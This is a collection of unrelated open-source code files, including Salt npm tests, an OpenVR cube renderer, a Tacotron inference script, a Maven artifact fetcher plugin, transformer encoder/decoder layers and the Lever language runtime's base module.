<gh_stars>1000+ import pytest from salt.exceptions import CommandExecutionError @pytest.fixture(scope="module", autouse=True) def install_npm(sminion): try: sminion.functions.state.single("pkg.installed", name="npm") # Just name the thing we're looking for sminion.functions.npm # pylint: disable=pointless-statement except (CommandExecutionError, AttributeError) as e: pytest.skip("Unable to install npm - " + str(e)) @pytest.mark.slow_test @pytest.mark.destructive_test @pytest.mark.requires_network def test_removed_installed_cycle(states, modules): project_version = "[email protected]" success = modules.npm.uninstall("pm2") assert success, "Unable to uninstall pm2 in prep for tests" ret = states.npm.installed(name=project_version) assert ret.result is True, "Failed to states.npm.installed {} - {}".format( project_version, ret.comment ) ret = states.npm.removed(name=project_version) assert ret.result is True, "Failed to states.npm.removed {} - {}".format( project_version, ret.comment )
src/openvr/color_cube_actor.py
risa2000/pyopenvr
204
12728971
#!/bin/env python # file color_cube_actor.py from textwrap import dedent from OpenGL.GL import * # @UnusedWildImport # this comment squelches an IDE warning from OpenGL.GL.shaders import compileShader, compileProgram from openvr.glframework import shader_string """ Color cube for use in "hello world" openvr apps """ class ColorCubeActor(object): """ Draws a cube 2________ 3 /| /| 6/_|____7/ | | |_____|_| | /0 | /1 |/______|/ 4 5 """ def __init__(self): self.shader = 0 self.vao = None def init_gl(self): vertex_shader = compileShader( shader_string(""" // Adapted from @jherico's RiftDemo.py in pyovr layout(location = 0) uniform mat4 Projection = mat4(1); layout(location = 4) uniform mat4 ModelView = mat4(1); layout(location = 8) uniform float Size = 0.3; // Minimum Y value is zero, so cube sits on the floor in room scale const vec3 UNIT_CUBE[8] = vec3[8]( vec3(-1.0, -0.0, -1.0), // 0: lower left rear vec3(+1.0, -0.0, -1.0), // 1: lower right rear vec3(-1.0, +2.0, -1.0), // 2: upper left rear vec3(+1.0, +2.0, -1.0), // 3: upper right rear vec3(-1.0, -0.0, +1.0), // 4: lower left front vec3(+1.0, -0.0, +1.0), // 5: lower right front vec3(-1.0, +2.0, +1.0), // 6: upper left front vec3(+1.0, +2.0, +1.0) // 7: upper right front ); const vec3 UNIT_CUBE_NORMALS[6] = vec3[6]( vec3(0.0, 0.0, -1.0), vec3(0.0, 0.0, 1.0), vec3(1.0, 0.0, 0.0), vec3(-1.0, 0.0, 0.0), vec3(0.0, 1.0, 0.0), vec3(0.0, -1.0, 0.0) ); const int CUBE_INDICES[36] = int[36]( 0, 1, 2, 2, 1, 3, // front 4, 6, 5, 6, 5, 7, // back 0, 2, 4, 4, 2, 6, // left 1, 3, 5, 5, 3, 7, // right 2, 6, 3, 6, 3, 7, // top 0, 1, 4, 4, 1, 5 // bottom ); out vec3 _color; void main() { _color = vec3(1.0, 0.0, 0.0); int vertexIndex = CUBE_INDICES[gl_VertexID]; int normalIndex = gl_VertexID / 6; _color = UNIT_CUBE_NORMALS[normalIndex]; if (any(lessThan(_color, vec3(0.0)))) { _color = vec3(1.0) + _color; } gl_Position = Projection * ModelView * vec4(UNIT_CUBE[vertexIndex] * Size, 1.0); } """), GL_VERTEX_SHADER) fragment_shader = compileShader( shader_string(""" in vec3 _color; out vec4 FragColor; void main() { FragColor = vec4(_color, 1.0); } """), GL_FRAGMENT_SHADER) self.shader = compileProgram(vertex_shader, fragment_shader) # self.vao = glGenVertexArrays(1) glBindVertexArray(self.vao) glEnable(GL_DEPTH_TEST) def display_gl(self, modelview, projection): glUseProgram(self.shader) glUniformMatrix4fv(0, 1, False, projection) glUniformMatrix4fv(4, 1, False, modelview) glBindVertexArray(self.vao) glDrawArrays(GL_TRIANGLES, 0, 36) def dispose_gl(self): glDeleteProgram(self.shader) self.shader = 0 if self.vao: glDeleteVertexArrays(1, (self.vao,)) self.vao = 0
scripts/tacotron_save_spec.py
gioannides/OpenSeq2Seq
1,459
12728989
%matplotlib inline # Replace the first box of Interactive_Infer_example.ipynb with this import IPython import librosa import numpy as np import scipy.io.wavfile as wave import tensorflow as tf import matplotlib.pyplot as plt from open_seq2seq.utils.utils import deco_print, get_base_config, check_logdir,\ create_logdir, create_model, get_interactive_infer_results from open_seq2seq.models.text2speech import save_audio args_T2S = ["--config_file=Infer_T2S/config.py", "--mode=interactive_infer", "--logdir=Infer_T2S/", "--batch_size_per_gpu=1", ] # A simpler version of what run.py does. It returns the created model and its saved checkpoint def get_model(args, scope): with tf.variable_scope(scope): args, base_config, base_model, config_module = get_base_config(args) checkpoint = check_logdir(args, base_config) model = create_model(args, base_config, config_module, base_model, None) return model, checkpoint model_T2S, checkpoint_T2S = get_model(args_T2S, "T2S") # Create the session and load the checkpoints sess_config = tf.ConfigProto(allow_soft_placement=True) sess_config.gpu_options.allow_growth = True sess = tf.InteractiveSession(config=sess_config) vars_T2S = {} for v in tf.get_collection(tf.GraphKeys.VARIABLES): if "T2S" in v.name: vars_T2S["/".join(v.op.name.split("/")[1:])] = v saver_T2S = tf.train.Saver(vars_T2S) saver_T2S.restore(sess, checkpoint_T2S) # line = "I was trained using Nvidia's Open Sequence to Sequence framework." # Define the inference function n_fft = model_T2S.get_data_layer().n_fft sampling_rate = model_T2S.get_data_layer().sampling_rate def infer(line): print("Input English") print(line) # Generate speech results = get_interactive_infer_results(model_T2S, sess, model_in=[line]) audio_length = results[1][4][0] if model_T2S.get_data_layer()._both: prediction = results[1][5][0] else: prediction = results[1][1][0] prediction = prediction[:audio_length-1,:] mag_prediction = model_T2S.get_data_layer().get_magnitude_spec(prediction) mag_prediction_squared = np.clip(mag_prediction, a_min=0, a_max=255) mag_prediction_squared = mag_prediction_squared**1.5 mag_prediction_squared = np.square(mag_prediction_squared) mel_basis = librosa.filters.mel(sr=22050, n_fft=1024, n_mels=80, htk=True, norm=None) mel = np.dot(mel_basis, mag_prediction_squared.T) mel = np.log(np.clip(mel, a_min=1e-5, a_max=None)) np.save("spec2", mel) plt.imshow(mel) plt.gca().invert_yaxis() plt.show() wav = save_audio(mag_prediction, "unused", "unused", sampling_rate=sampling_rate, save_format="np.array", n_fft=n_fft) audio = IPython.display.Audio(wav, rate=sampling_rate) print("Generated Audio") IPython.display.display(audio)
sdk/cwl/tests/test_util.py
rpatil524/arvados
222
12729006
<reponame>rpatil524/arvados # Copyright (C) The Arvados Authors. All rights reserved. # # SPDX-License-Identifier: Apache-2.0 from builtins import bytes import unittest import mock import datetime import httplib2 from arvados_cwl.util import * from arvados.errors import ApiError class MockDateTime(datetime.datetime): @classmethod def utcnow(cls): return datetime.datetime(2018, 1, 1, 0, 0, 0, 0) datetime.datetime = MockDateTime class TestUtil(unittest.TestCase): def test_get_intermediate_collection_info(self): name = "one" current_container = {"uuid": "zzzzz-8i9sb-zzzzzzzzzzzzzzz"} intermediate_output_ttl = 120 info = get_intermediate_collection_info(name, current_container, intermediate_output_ttl) self.assertEqual(info["name"], "Intermediate collection for step one") self.assertEqual(info["trash_at"], datetime.datetime(2018, 1, 1, 0, 2, 0, 0)) self.assertEqual(info["properties"], {"type" : "intermediate", "container" : "zzzzz-8i9sb-zzzzzzzzzzzzzzz"}) def test_get_current_container_success(self): api = mock.MagicMock() api.containers().current().execute.return_value = {"uuid" : "zzzzz-8i9sb-zzzzzzzzzzzzzzz"} current_container = get_current_container(api) self.assertEqual(current_container, {"uuid" : "zzzzz-8i9sb-zzzzzzzzzzzzzzz"}) def test_get_current_container_error(self): api = mock.MagicMock() api.containers().current().execute.side_effect = ApiError(httplib2.Response({"status": 300}), bytes(b"")) logger = mock.MagicMock() with self.assertRaises(ApiError): get_current_container(api, num_retries=0, logger=logger) def test_get_current_container_404_error(self): api = mock.MagicMock() api.containers().current().execute.side_effect = ApiError(httplib2.Response({"status": 404}), bytes(b"")) logger = mock.MagicMock() current_container = get_current_container(api, num_retries=0, logger=logger) self.assertEqual(current_container, None)
atomic_reactor/plugins/fetch_maven_artifacts.py
qixiang/atomic-reactor
113
12729008
<filename>atomic_reactor/plugins/fetch_maven_artifacts.py """ Copyright (c) 2017-2022 Red Hat, Inc All rights reserved. This software may be modified and distributed under the terms of the BSD license. See the LICENSE file for details. """ import dataclasses import functools import hashlib import os from pathlib import Path from typing import Iterator, List, Sequence, Dict import koji from atomic_reactor import util from atomic_reactor.constants import (PLUGIN_FETCH_MAVEN_KEY, REPO_FETCH_ARTIFACTS_URL, REPO_FETCH_ARTIFACTS_KOJI) from atomic_reactor.config import get_koji_session from atomic_reactor.dirs import BuildDir from atomic_reactor.download import download_url from atomic_reactor.plugin import Plugin from atomic_reactor.utils.koji import NvrRequest from atomic_reactor.utils.pnc import PNCUtil try: from urlparse import urlparse except ImportError: from urllib.parse import urlparse @dataclasses.dataclass(frozen=True) class DownloadRequest: url: str dest: str checksums: Dict[str, str] class FetchMavenArtifactsPlugin(Plugin): key = PLUGIN_FETCH_MAVEN_KEY is_allowed_to_fail = False DOWNLOAD_DIR = 'artifacts' def __init__(self, workflow): """ :param workflow: DockerBuildWorkflow instance """ super(FetchMavenArtifactsPlugin, self).__init__(workflow) self.path_info = self.workflow.conf.koji_path_info all_allowed_domains = self.workflow.conf.artifacts_allowed_domains self.allowed_domains = set(domain.lower() for domain in all_allowed_domains or []) self.session = None self._pnc_util = None self.no_source_artifacts = [] self.source_url_to_artifacts = {} @property def pnc_util(self): if not self._pnc_util: pnc_map = self.workflow.conf.pnc if not pnc_map: raise RuntimeError('No PNC configuration found in reactor config map') self._pnc_util = PNCUtil(pnc_map) return self._pnc_util def process_by_nvr(self, nvr_requests: List[NvrRequest]): # components are metadata about nvr artifacts that we're going to fetch components = [] download_queue = [] errors = [] for nvr_request in nvr_requests: build_info = self.session.getBuild(nvr_request.nvr) if not build_info: errors.append('Build {} not found.'.format(nvr_request.nvr)) continue maven_build_path = self.path_info.mavenbuild(build_info) build_archives = self.session.listArchives(buildID=build_info['id'], type='maven') build_archives = nvr_request.match_all(build_archives) for build_archive in build_archives: maven_file_path = self.path_info.mavenfile(build_archive) # NOTE: Don't use urljoin here because maven_build_path does # not contain a trailing slash, which causes the last dir to # be dropped. url = maven_build_path + '/' + maven_file_path checksum_type = koji.CHECKSUM_TYPES[build_archive['checksum_type']] checksums = {checksum_type: build_archive['checksum']} download_queue.append(DownloadRequest(url, maven_file_path, checksums)) components.append({ 'type': 'kojifile', 'filename': build_archive['filename'], 'filesize': build_archive['size'], 'checksum': build_archive['checksum'], 'checksum_type': checksum_type, 'nvr': nvr_request.nvr, 'archive_id': build_archive['id'], }) unmatched_archive_requests = nvr_request.unmatched() if unmatched_archive_requests: errors.append('NVR request for "{}", failed to find archives for: "{}"' .format(nvr_request.nvr, unmatched_archive_requests)) continue if errors: raise ValueError('Errors found while processing {}: {}' .format(REPO_FETCH_ARTIFACTS_KOJI, ', '.join(errors))) return components, download_queue def process_by_url(self, url_requests): download_queue = [] # we'll capture all source artifacts of url artifacts in a source_download_queue # later on maven_url_sources_metadata plugin will process this queue to generate # remote source files that are later used in source container build to get sources # of url artifacts. # we have to do this in post build to avoid having source artifacts in build_dir # during binary build source_download_queue = [] errors = [] for url_request in url_requests: url = url_request['url'] if self.allowed_domains: parsed_file_url = urlparse(url.lower()) file_url = parsed_file_url.netloc + parsed_file_url.path if not any(file_url.startswith(prefix) for prefix in self.allowed_domains): errors.append('File URL {} is not in list of allowed domains: {}' .format(file_url, self.allowed_domains)) continue checksums = {algo: url_request[algo] for algo in hashlib.algorithms_guaranteed if algo in url_request} target = url_request.get('target', url.rsplit('/', 1)[-1]) download_queue.append(DownloadRequest(url, target, checksums)) artifact = { 'url': url_request['url'], 'checksums': checksums, 'filename': os.path.basename(url_request['url']) } if 'source-url' not in url_request: self.no_source_artifacts.append(artifact) msg = f"No source-url found for {url_request['url']}.\n" self.log.warning(msg) msg += 'fetch-artifacts-url without source-url is deprecated\n' msg += 'to fix this please provide the source-url according to ' \ 'https://osbs.readthedocs.io/en/latest/users.html#fetch-artifacts-url-yaml' self.log.user_warning(msg) continue source_url = url_request['source-url'] checksums = {algo: url_request[('source-' + algo)] for algo in hashlib.algorithms_guaranteed if ('source-' + algo) in url_request} if source_url not in self.source_url_to_artifacts: self.source_url_to_artifacts[source_url] = [artifact] # source_url will mostly be gerrit URLs that don't have filename # in the URL itself, so we'll have to get filename from URL response target = os.path.basename(source_url) source_download_queue.append(dataclasses.asdict(DownloadRequest(source_url, target, checksums))) else: self.source_url_to_artifacts[source_url].append(artifact) if errors: raise ValueError('Errors found while processing {}: {}' .format(REPO_FETCH_ARTIFACTS_URL, ', '.join(errors))) return download_queue, source_download_queue def process_pnc_requests(self, pnc_requests): download_queue = [] artifact_ids = [] builds = pnc_requests.get('builds', []) if builds: pnc_build_metadata = {'builds': []} else: pnc_build_metadata = {} for build in builds: pnc_build_metadata['builds'].append({'id': build['build_id']}) for artifact in build['artifacts']: artifact_ids.append(artifact['id']) url, checksums = self.pnc_util.get_artifact(artifact['id']) download_queue.append(DownloadRequest(url, artifact['target'], checksums)) return artifact_ids, download_queue, pnc_build_metadata def download_files( self, downloads: Sequence[DownloadRequest], build_dir: BuildDir ) -> Iterator[Path]: """Download maven artifacts to a build dir.""" artifacts_path = build_dir.path / self.DOWNLOAD_DIR koji_config = self.workflow.conf.koji insecure = koji_config.get('insecure_download', False) self.log.debug('%d files to download', len(downloads)) session = util.get_retrying_requests_session() for index, download in enumerate(downloads): dest_path = artifacts_path / download.dest dest_dir = dest_path.parent dest_filename = dest_path.name if not dest_dir.exists(): dest_dir.mkdir(parents=True) self.log.debug('%d/%d downloading %s', index + 1, len(downloads), download.url) download_url(url=download.url, dest_dir=dest_dir, insecure=insecure, session=session, dest_filename=dest_filename, expected_checksums=download.checksums) yield dest_path def run(self): self.session = get_koji_session(self.workflow.conf) nvr_requests = [ NvrRequest(**nvr_request) for nvr_request in util.read_fetch_artifacts_koji(self.workflow) or [] ] pnc_requests = util.read_fetch_artifacts_pnc(self.workflow) or {} url_requests = util.read_fetch_artifacts_url(self.workflow) or [] components, nvr_download_queue = self.process_by_nvr(nvr_requests) url_download_queue, source_download_queue = self.process_by_url(url_requests) pnc_artifact_ids, pnc_download_queue, pnc_build_metadata = self.process_pnc_requests( pnc_requests) download_queue = pnc_download_queue + nvr_download_queue + url_download_queue download_to_build_dir = functools.partial(self.download_files, download_queue) self.workflow.build_dir.for_all_platforms_copy(download_to_build_dir) return { 'components': components, 'download_queue': [dataclasses.asdict(download) for download in download_queue], 'no_source': self.no_source_artifacts, 'pnc_artifact_ids': pnc_artifact_ids, 'pnc_build_metadata': pnc_build_metadata, 'source_download_queue': source_download_queue, 'source_url_to_artifacts': self.source_url_to_artifacts, }
models/res_users.py
wdw139130/wechat-mall
108
12729102
<gh_stars>100-1000 # -*- coding: utf-8 -*- from odoo import models, fields, api class ResUsers(models.Model): _inherit = 'res.users' sub_domain = fields.Char('子域名', help='用于小程序接口的子域名。', index=True) @api.model def create(self, vals): from uuid import uuid1 vals['sub_domain'] = uuid1().get_hex() return super(ResUsers, self).create(vals)
test.py
wu546300070/weiboanalysis
685
12729133
<gh_stars>100-1000 import re word="jofwjoifA级哦啊接我金佛安fewfae慰剂serge" p = re.compile(r'\w', re.L) result = p.sub("", word) print(result)
easytransfer/layers/encoder_decoder.py
johnson7788/EasyTransfer
806
12729136
<reponame>johnson7788/EasyTransfer # coding=utf-8 # Copyright (c) 2019 Alibaba PAI team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from tensorflow.python.layers.base import Layer from .activations import gelu_new from .attention import Attention, CrossAttention from .core import dense_dropoutput_layernorm, Dense from .utils import get_initializer class EncoderBlock(Layer): def __init__(self, config, **kwargs): super(EncoderBlock, self).__init__(**kwargs) self.attention = Attention(config, name="attention") # Use gelu_new, then match results self.intermediate = Dense( units=config.intermediate_size, activation=gelu_new, kernel_initializer=get_initializer(config.initializer_range), name="intermediate/dense") self.bert_output = dense_dropoutput_layernorm(config, name="output") def call(self, inputs, training=False): hidden_states, attention_mask = inputs attention_output = self.attention([hidden_states, attention_mask], training=training) intermediate_output = self.intermediate(attention_output) layer_output = self.bert_output([intermediate_output, attention_output], training=training) return layer_output, attention_output class DecoderBlock(Layer): def __init__(self, config, **kwargs): super(DecoderBlock, self).__init__(**kwargs) self.attention = Attention(config, name="decoder_attention") self.cross_attention = CrossAttention(config, name="decoder_cross_attention") # Use gelu_new, then match results self.intermediate = Dense( units=config.intermediate_size, activation=gelu_new, kernel_initializer=get_initializer(config.initializer_range), name="intermediate/dense") self.output_1 = dense_dropoutput_layernorm(config, name="output_1") self.output_2 = dense_dropoutput_layernorm(config, name="output_2") def call(self, inputs, training=False): hidden_states, encoder_hidden_states, attention_mask, encoder_attention_mask = inputs attention_output = self.attention([hidden_states, attention_mask], training=training) cross_attention_output = self.cross_attention([hidden_states, encoder_hidden_states, encoder_attention_mask]) attention_output = self.output_1([attention_output, cross_attention_output], training=training) intermediate_output = self.intermediate(attention_output) layer_output = self.output_2([intermediate_output, attention_output], training=training) return layer_output, attention_output class Encoder(Layer): def __init__(self, config, **kwargs): super(Encoder, self).__init__(**kwargs) self.layer = [EncoderBlock(config, name="layer_{}".format(i)) for i in range(config.num_hidden_layers)] def call(self, inputs, training=False): hidden_states, attention_mask = inputs all_hidden_states = () all_att_outputs = () for i, layer_module in enumerate(self.layer): layer_output, att_output = layer_module([hidden_states, attention_mask], training=training) hidden_states = layer_output all_hidden_states = all_hidden_states + (hidden_states,) all_att_outputs = all_att_outputs + (att_output,) final_outputs = [] for hidden_states in all_hidden_states: final_outputs.append(hidden_states) return final_outputs, all_att_outputs class Decoder(Layer): def __init__(self, config, **kwargs): super(Decoder, self).__init__(**kwargs) self.layer = [DecoderBlock(config, name="decoder_layer_{}".format(i)) for i in range(config.num_hidden_layers)] def call(self, inputs, training=False): hidden_states, encoder_hidden_states, attention_mask, encoder_attention_mask = inputs all_hidden_states = () all_att_outputs = () for i, layer_module in enumerate(self.layer): layer_output, att_output = layer_module([hidden_states, encoder_hidden_states, attention_mask, encoder_attention_mask ], training=training) hidden_states = layer_output all_hidden_states = all_hidden_states + (hidden_states,) all_att_outputs = all_att_outputs + (att_output,) final_outputs = [] for hidden_states in all_hidden_states: final_outputs.append(hidden_states) return final_outputs, all_att_outputs
runtime/base.py
cheery/lever
136
12729159
<reponame>cheery/lever<gh_stars>100-1000 from async_io import Event, Queue from evaluator.loader import from_object from evaluator.sourcemaps import TraceEntry from rpython.rlib.objectmodel import specialize, always_inline from rpython.rlib.rstring import UnicodeBuilder from rpython.rtyper.lltypesystem import rffi from space.customobject import CustomObject_instantiate from space import * import core import naming import os import pathobj #import stdlib import sys import time import uv_handle import uv_stream import uv_timer import uv_util import vectormath import vector # The base environment module = Module(u'base', { u'builtin': Builtin.interface, u'greenlet': core.Greenlet.interface, u'interface': Interface.interface, u'Id': Id.interface, u'dict': Dict.interface, u'Module': Module.interface, u'module': Module.interface, # TODO: deprecate and then remove u'object': Object.interface, u'list': List.interface, u'multimethod': Multimethod.interface, u'float': Float.interface, u'float_repr': FloatRepr.interface, u'int': Integer.interface, u'bool': Boolean.interface, u'str': String.interface, u'null': null, u'true': true, u'false': false, u'path': pathobj.Path.interface, u'property': Property.interface, u'Uint8Data': Uint8Data.interface, u'Uint8Array': Uint8Array.interface, u'Uint8Slice': Uint8Slice.interface, u'Uint8Builder': Uint8Builder.interface, u'Utf8Decoder': Utf8Decoder.interface, u'StringBuilder': StringBuilder_.interface, u'schedule': Builtin(core.schedule, u'schedule'), u'set': Set.interface, u'slice': Slice.interface, u'DocRef': naming.DocRef.interface, u'Event': Event.interface, u'Queue': Queue.interface, u'Timer': uv_timer.Timer.interface, u'Handle': uv_handle.Handle.interface, u'Stream': uv_stream.Stream.interface, u'TTY': uv_stream.TTY.interface, u'Pipe': uv_stream.Pipe.interface, # The new vector interface, lets see how it fares. u'Numeric': vector.Numeric.interface, }, frozen=True) @Module.instantiator @signature(String, Module, optional=1) def module_instantiate(name, extends): return Module(name.string, {}, extends) # we may later want to do the same for the stuff you see above. for error in all_errors: module.setattr_force(error.interface.name, error.interface) for _, error in uv_util.errors: module.setattr_force(error.interface.name, error.interface) for name, value in operators.by_symbol.iteritems(): module.setattr_force(name, value) for name, value in vectormath.by_symbol.iteritems(): module.setattr_force(name, value) def builtin(fn): name = fn.__name__.rstrip('_').decode('utf-8') module.setattr_force(name, Builtin(fn, name)) return fn @builtin @signature(Object, Float, optional=1) def get_name(obj, stale): if stale is None: name = naming.get_name(obj) else: name = naming.get_name(obj, stale.number) if name is not None: return String(name) else: return null @builtin @signature(Object, Object, optional=1) def load(program, path): if path is None: path = null else: path = pathobj.to_path(path) return from_object(program, path) @builtin def class_(argv): exnihilo = argv[0] parent = Object.interface name = String(u"customobject") assert 1 <= len(argv) <= 3 if len(argv) > 1: parent = argv[1] if len(argv) > 2: name = argv[2] assert isinstance(exnihilo, Exnihilo) methods = {} for key, index in exnihilo.map.attribute_indexes.items(): methods[key] = exnihilo.storage[index] interface = Interface( cast(parent, Interface, u"parent"), cast(name, String, u"name").string, methods, CustomObject_instantiate) core.g.finalizer_queue.register_finalizer(interface) return interface @builtin @signature(Object) def iter_(obj): return obj.iter() @builtin @signature(Object) def hash_(obj): return Integer(obj.hash()) @builtin @signature(Object) def repr_(obj): return String(obj.repr()) @builtin @signature(List) def reversed_(obj): return ReversedListIterator(reversed(obj.contents)) class ReversedListIterator(Object): _immutable_fields_ = ['iterator'] def __init__(self, iterator): self.iterator = iterator def iter(self): return self @ReversedListIterator.method(u"next", signature(ReversedListIterator)) def ReversedListIterator_next(self): return self.iterator.next() @builtin @signature(Object, Object) def getitem(obj, index): return obj.getitem(index) @builtin @signature(Object, Object, Object) def setitem(obj, index, value): return obj.setitem(index, value) @builtin @signature(Object) def listattr(obj): return List(obj.listattr()) ## The interface for analysing the interface. @builtin @signature(Interface) def list_methods(interface): out = [] for name in interface.methods: out.append(String(name)) return List(out) @builtin @signature(Interface) def list_multimethods(interface): out = [] for record in interface.multimethods: types = [] for ref in record.vec: interface = ref.weakref() if interface is not None: types.append(interface) if len(types) == len(record.vec): row = Exnihilo() row.setattr(u'multimethod', record.multimethod) row.setattr(u'types', List(types)) out.append(row) return List(out) @builtin @signature(Object, String) def getattr(obj, index): return obj.getattr(index.string) @builtin @signature(Object, String, Object, optional=1) def getattr_or(obj, index, default): if default is None: default = null return obj.getattr_or(index.string, default) @builtin @signature(Object, String, Object) def setattr(obj, index, value): return obj.setattr(index.string, value) @builtin @signature(String) def ord_(string): if len(string.string) != 1: raise unwind(LError(u"ord expects a char")) return Integer(ord(string.string[0])) @builtin @signature(Integer) def chr_(value): return String(unichr(value.value)) @builtin @signature(Object, Object) def isinstance_(value, which_list): if isinstance(which_list, List): whichs = which_list.contents else: whichs = [which_list] interface = get_interface(value) while interface is not null: if interface in whichs: return true # There should be exactly one recursively defined interface. if interface.parent is interface: return false interface = interface.parent return false @builtin @signature(String, Integer, optional=1) def parse_int(string, base): return Integer(parse_int_(string, base)) @builtin @signature(String) def parse_float(string): return FloatRepr(string) # And and or are macros in the compiler. These are # convenience functions, likely not often used. # erm. Actually 'and' function is used by chaining. @builtin @signature(Object, Object) def and_(a, b): return boolean(is_true(a) and is_true(b)) @builtin @signature(Object, Object) def or_(a, b): return boolean(is_true(a) or is_true(b)) @builtin @signature(Object) def len_(obj): return obj.getattr(u'length') @builtin @signature(Object) def not_(a): return boolean(is_false(a)) @builtin @signature(String) def encode_utf8(value): return to_uint8array(value.string.encode('utf-8')) @builtin @signature(Uint8Data) def decode_utf8(value): try: return String(value.to_str().decode('utf-8')) except UnicodeDecodeError as error: raise space.unwind(space.LError(u"unicode decode failed")) @builtin def time_(argv): return Float(time.time()) @builtin @signature() def getcwd(): return pathobj.getcwd() @builtin @signature(Object) def chdir(obj): pathobj.chdir(obj) return null @builtin @signature(Integer, Integer, Integer, optional=2) def range_(start, stop, step): if stop is None: stop = start.value start = 0 else: start = start.value stop = stop.value if step is None: step = 1 else: step = step.value if step == 0: raise unwind(LTypeError(u"step==0")) return Range(start, stop, step) class Range(Object): __slots__ = ['start', 'stop', 'step', 'sign', 'current'] _immutable_fields_ = ['start', 'stop', 'step', 'sign'] def __init__(self, start, stop, step): self.current = start self.stop = stop self.step = step self.sign = +1 if step >= 0 else -1 def iter(self): return self @Range.method(u"next", signature(Range)) def Range_next(self): if self.current*self.sign < self.stop*self.sign: i = self.current self.current += self.step return Integer(i) raise StopIteration() @builtin @signature(Interface) def super_(interface): return interface.parent #@builtin #@signature(Object) #def attach_debugger(debugger): # ec = main.get_ec() # ec.debug_hook = debugger # return null import rlibuv as uv @builtin @signature(space.Integer, optional=1) def exit(obj): ec = core.get_ec() ec.exit_status = 0 if obj is None else int(obj.value) uv.stop(ec.uv_loop) ec.enqueue(ec.current) # Trick to ensure we get Discard -exception here return core.switch([ec.eventloop]) # Once they are created. @builtin @signature() def getcurrent(): return core.get_ec().current @builtin @signature() def new_log(): queue = Queue() if queue in core.g.log.loggers: raise unwind(LError(u"queue has been registered twice.")) core.g.log.loggers.append(queue) return queue @builtin def print_(argv): core.g.log.other(u"info", List(argv)) return null @builtin @signature(Object, String, optional=1) def info(value, type): if type is None: core.g.log.other(u"info", value) else: core.g.log.other(type.string, value) return null @builtin @signature(Object) def print_traceback(exception): core.g.log.exception(exception) return null @builtin @signature(Object) def format_traceback(exception): return String(format_traceback_raw(exception)) def format_traceback_raw(exception, in_exception_repr=False): traceback = exception.getattr(u"traceback") if not isinstance(traceback, space.List): raise space.unwind(space.LError(u"Expected null or list as .traceback: %s" % traceback.repr())) out = u"" if len(traceback.contents) > 0: out = u"\033[31mTraceback:\033[36m\n" for entry in reversed(traceback.contents): if not isinstance(entry, TraceEntry): continue name, col0, lno0, col1, lno1 = entry.pc_location() out += u" %s: %d,%d : %d,%d\n" % (name.repr(), lno0, col0, lno1, col1) out += u"\033[31m" out += space.get_interface(exception).name out += u":\033[0m" try: return out + u" " + exception.repr() except Unwinder as unwinder: if in_exception_repr: return out + u" ... Second error during exception repr" return (out + u" ... Error during exception repr\n" + format_traceback_raw(unwinder.exception, True)) from rpython.rtyper.lltypesystem import rffi, lltype, llmemory from rpython.rlib import rgil import rlibuv as uv import uv_callback @builtin @signature(Object, variadic=True) def work(func, args): if not core.g.work_pool: # The function will be called in separate thread, # so allocate GIL here rgil.allocate() core.g.work_pool = WorkPool() req = lltype.malloc(uv.work_ptr.TO, flavor='raw', zero=True) work = Work(func, args) core.g.work_pool.push(req, work) try: response = uv_callback.after_work(req) response.wait(uv.queue_work(response.ec.uv_loop, req, work_cb, uv_callback.after_work.cb)) if work.unwinder: raise work.unwinder return work.retval finally: core.g.work_pool.pop(req) lltype.free(req, flavor='raw') def work_cb(handle): work = core.g.work_pool.peek(handle) #must_leave = False # must_leave = space.threadlocals.try_enter_thread(space) # Should check for separate threads here and crash # if the callback comes from a thread that has no execution context. try: work.retval = work.func.call(work.args) except Unwinder as unwinder: work.unwinder = unwinder except Exception as e: try: os.write(2, "SystemError: callback raised ") os.write(2, str(e)) os.write(2, "\n") except: pass # if must_leave: # space.threadlocals.leave_thread(space) class WorkPool: def __init__(self): self.table = {} @jit.dont_look_inside def peek(self, handle): return self.table[rffi.cast_ptr_to_adr(handle)] @jit.dont_look_inside def push(self, handle, value): self.table[rffi.cast_ptr_to_adr(handle)] = value @jit.dont_look_inside def pop(self, handle): return self.table.pop(rffi.cast_ptr_to_adr(handle)) class Work: def __init__(self, func, args): self.func = func self.args = args self.retval = null self.unwinder = None @builtin @signature(Integer) def guess_handle(num): return Integer(uv_stream.uv.guess_handle(num.value)) @builtin @signature(Object) def instantiate_(i): if interface == Object: return Exnihilo() if isinstance(i, Interface): return CustomObject(i) raise OldError(u"Cannot instantiate from non-interface") @builtin @signature(Object) def register_finalizer(obj): core.g.finalizer_queue.register_finalizer(obj) return null # @builtin # @signature(Object) # def finalize_on_exit(obj): # ec = core.get_ec() # ec.must_finalize_on_quit[obj] = true # return null @builtin def on_exit(argv): ec = core.get_ec() ec.on_exit.append(argv) return null
advisor_server/suggestion/algorithm/base_hyperopt_algorithm_test.py
silvery107/advisor
1,498
12729163
from django.test import TestCase from suggestion.algorithm.abstract_algorithm import AbstractSuggestionAlgorithm from suggestion.algorithm.base_hyperopt_algorithm import BaseHyperoptAlgorithm class BaseHyperoptAlgorithmTest(TestCase): def setUp(self): pass def tearDown(self): pass def test_init(self): instance = BaseHyperoptAlgorithm() self.assertTrue(isinstance(instance, AbstractSuggestionAlgorithm)) self.assertEqual(instance.__class__, BaseHyperoptAlgorithm)
vkwave/bots/core/dispatching/extensions/callback/__init__.py
krasnovmv/vkwave
222
12729230
<filename>vkwave/bots/core/dispatching/extensions/callback/__init__.py from ._aiohttp import AIOHTTPCallbackExtension
source/lib/probe.py
WinterWinds-Robotics/pymmw
144
12729240
